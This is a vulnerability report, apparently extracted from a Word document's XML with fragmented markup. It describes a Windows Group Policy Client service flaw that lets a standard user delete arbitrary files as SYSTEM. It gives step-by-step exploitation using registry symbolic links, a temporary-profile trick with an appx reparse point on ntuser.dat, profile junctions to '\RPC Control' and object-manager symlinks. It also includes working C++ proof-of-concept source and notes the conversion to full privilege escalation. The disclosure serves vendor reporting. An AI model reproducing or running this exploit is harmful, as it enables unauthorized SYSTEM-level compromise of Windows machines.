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ca82rsk4z7q2" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Group policy client service 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3ca3o2tvggp9" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Insecure file operations causing escalation of privilege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group policy client service do insecure file rename operations when a users NTUSER.pol file gets updated.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practice several obstacles have to be overcome before exploitation becomes possible.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the attached proof of concept I have managed to do just that and create conditions where the service ends up doing file operations on c:\windows\system32\license.rtf instead of %USERPROFILE%\TEMPNTUSER.POL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The registry status value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Before the service updates the NTUSER.pol file it checks the registry value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HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy\Status\GPExtensions\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\status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Only if the DWORD value equals 0x01 the service will proceed with updating the NTUSER.POL  file.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In general we have full permission to all keys in HKEY_CURRENT_USER, but values related to group policy are only readable by standard users.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To overcome this requirement we use a vulnerability in the user profile service.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The registry key HKEY_CURRENT_USER\Volatile Environment gets created and access control list is applied when a profile logs in.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By replacing that key with a registry symbolic link targeting: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HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy\Status\GPExtensions\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}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the next time the profile logs in an  ACL with current user having full permission gets applied to the target key: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85405" cy="1938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5405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When that is done- we can set the status DWORD value named status to 0x01.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2. Making the user profile folder a junction folder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If the user profile service is a junction folder targeting \RPC Control and there is a symbolic link with name TEMPNTUSER:POL in \RPC Control the group policy client service will follow the link before doing privileged operations on the target.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A requirement for creating a junction folder is the folder being empty, that is not easy to accomplish when it is the user profile folder having multiply locked files inside.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To bypass that we use a trick where we make the user profile service log us in with a “temporary profile” where the profile folder becomes c:\users\temp - leaving the real folder without any locked files.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If the ntuser.dat file cannot be opened when logging in - the temporary profile will be used.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As ntuser.dat is always open and locked when logged in- the only way to make the file unopenable is by creating an alternative data stream on it and setting an appx reparse point on it.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As there is only one reparse point per file, regardless of alternative data streams- setting such a reparse point on the alternative data stream will have the effect that the primary unnamed stream also becomes unopenable.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When that is done logging out and in causes us to be running as a temporary profile.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Now we create the folder c:\profileBackup and move all files from %USERPROFILE% into it.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Then we make %USERPROFILE% a junction folder targeting c:\profileBackup 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Before we relogin we take care to remove the appx reparse point from ntuser.dat as we do not want to login with a temporary profile again.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After logging in and out, our %USERPROFILE% path is back to normal- but all files actually reside in c:\profileBackup - file operations being redirected due to %USERPROFILE% being a junction folder.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Making a proof of concept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Unfortunately the nature of these vulnerabilities requires us to login and out several times.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When we log in with a temporary profile we get a copy of the default HKEY_CURRENT_USER that gets discarded when we login.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That forces us to do the steps in this order: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ntuser.dat invalid and relogin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temporary profile move files from %USERPROFILE% into c:\backupProfile and make it a junction folder targetting c:\backupProfile. Make ntuser.dat valid. Relogin.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our normal HKEY_CURRENT_USER make Volatile Environment symbolic link targetting Software\Microsoft\Windows\CurrentVersion\Group Policy\Status\ GPExtensions\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}. Relogin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When we logged in an access control list granting us full permission to the key status is in was applied. This makes it possible to set status to 0x01.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Now we can create symbolic links for each file in c:\profileBackup in “\RPC Control” targetting the same location in c:\profileBackup- but we also make one additional symbolic link: TEMPNTUSER.POL targetting c:\windows\system32\license.rtf.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Then we change the junction folder %USERPROFILE% to target “\RPC Control”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Then Gpupdate.exe /target:user /force” is executed,it will check if %USERPROFILE%\TEMPNTUSER.POL exists , and delete it if so.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By having %USERPROFILE% now targetting “\RPC Control” our symbolic link to c:\windows\system32\license.rtf is followed and the file is deleted in system security context.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As shown in a previous submission of mine any arbitrary file deletion is convertible to  escalation of privilege by deleting the C:\ProgramData\Microsoft\Windows\WER folder.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When executing the attached POC be aware that messageboxes is shown that can be covered by messages from Windows- so move the dialogbox from Windows and click ok to proceed.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The POC will do required steps then log the current user out, you have to login again and execute the file again 3 times.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Relevant source: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&lt;exploitLib/exploitLib.h&gt;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&lt;Lmcons.h&gt;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x::literalNS;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auto getUsername()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wchar_t usernamebuf[UNLEN + 1]{ 0x0000 };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DWORD size = UNLEN + 1;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GetUserName((TCHAR*)usernamebuf, &amp;size);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static auto username = std::wstring{ usernamebuf };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username;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auto hkey_current_user = L"\\registry\\user\\"s + x::getCurrentUserSidString();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auto volatile_enviroment = hkey_current_user + L"\\Volatile Environment";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bool fixStatus()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try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x::regKey{ volatile_enviroment }["status"] = 0x01;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return true;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catch (...) {}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 (auto&amp; keyName : x::regKey{ volatile_enviroment }.getSubKeys())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x::regKey{ volatile_enviroment + L"\\"s + keyName }.deleteKey();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x::regKey{ volatile_enviroment }.deleteKey();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x::createRegLinkKey{ volatile_enviroment , false }.setLinkDestination(</w:t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hkey_current_user + L"\\Software\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\Status\\GPExtensions\\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}"</w:t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);</w:t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false;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main(int, char* args[])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try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 (!"%USERPROFILE%"_p.ends_with(L"TEMP") &amp;&amp; !x::file{ "%USERPROFILE%"_p }.getFinalPath().ends_with(L"profileBackup"))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(MessageBox(0, L"Not logged in as temp user, messing up ntuser.dat", 0, MB_YESNO) == IDNO) return 0;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x::file{ "%USERPROFILE%\\ntuser.dat:stream"_p ,FILE_WRITE_ATTRIBUTES }.makeappexec(L"", L"", L"");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ExitWindows(0, 0);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return 0;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 (x::file{ "%USERPROFILE%"_p }.getFinalPath().ends_with(L"profileBackup"))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(!fixStatus()) {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(MessageBox(0, L"Could not set status registry value. Symlink created , relogin", 0, MB_YESNO) == IDNO) return 0;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ExitWindows(0, 0);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return 0;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(MessageBox(0, L"Profile files redirected to c:\profilebackup, making file synlinks and updating user group policy", 0, MB_YESNO) == IDNO) return 0;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std::vector&lt;x::symlink&gt; symlinks;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for (auto&amp; f : x::file{ "C:\\profileBackup"_p }.enumDir())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symlinks.emplace_back(("\\RPC Control"_p / f), "\\??\\c:\\profileBackup"_p / f);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symlinks.emplace_back(L"\\RPC Control\\tempntuser.pol", "\\??\\c:\\windows\\system32\\license.rtf"_p);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x::file{ "C:\\users\\"_p / getUsername() , FILE_WRITE_ATTRIBUTES, FILE_OPEN_REPARSE_POINT }.makeJunction("\\RPC Control");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WaitForSingleObject(x::process::execute("%WINDIR%\\system32\\gpupdate.exe"_p, L"/Target:user /force").process, INFINITE);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MessageBox(0, L"Group policy service should have deleted c:\\windows\\system32\\license.rtf now", 0, 0);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(MessageBox(0, L"Logged in as temp user, moving profile files to c:\\profileBackup", 0, 0) == IDNO) return 0;</w:t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x::file{ "C:\\profileBackup"_p ,FILE_READ_ATTRIBUTES  ,FILE_DIRECTORY_FILE };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x::file{ "C:\\users\\"_p / getUsername() / "ntuser.dat:stream"_p,   </w:t>
        <w:tab/>
        <w:t xml:space="preserve">FILE_WRITE_ATTRIBUTES, FILE_OPEN_REPARSE_POINT }.delete_reparse_point(IO_REPARSE_TAG_APPEXECLINK);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for (auto&amp; f : x::file{ "C:\\users\\"_p / getUsername() }.enumDir())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x::file{ "C:\\users\\"_p / getUsername() / x::strpath{f} , DELETE | FILE_READ_ATTRIBUTES, FILE_OPEN_REPARSE_POINT }.rename("c:\\profileBackup"_p / f);</w:t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x::file{ "C:\\users\\"_p / getUsername() , FILE_WRITE_ATTRIBUTES }.makeJunction("C:\\profileBackup");</w:t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ExitWindows(0, 0);</w:t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catch (wil::ResultException&amp; e)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std::wcout &lt;&lt; _com_error{ (HRESULT)RtlNtStatusToDosError(e.GetErrorCode()) }.ErrorMessage() &lt;&lt; std::endl;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std::wcout &lt;&lt; e.what() &lt;&lt; std::endl;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catch (std::exception&amp; e)</w:t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std::wcout &lt;&lt; e.what() &lt;&lt; std::endl;</w:t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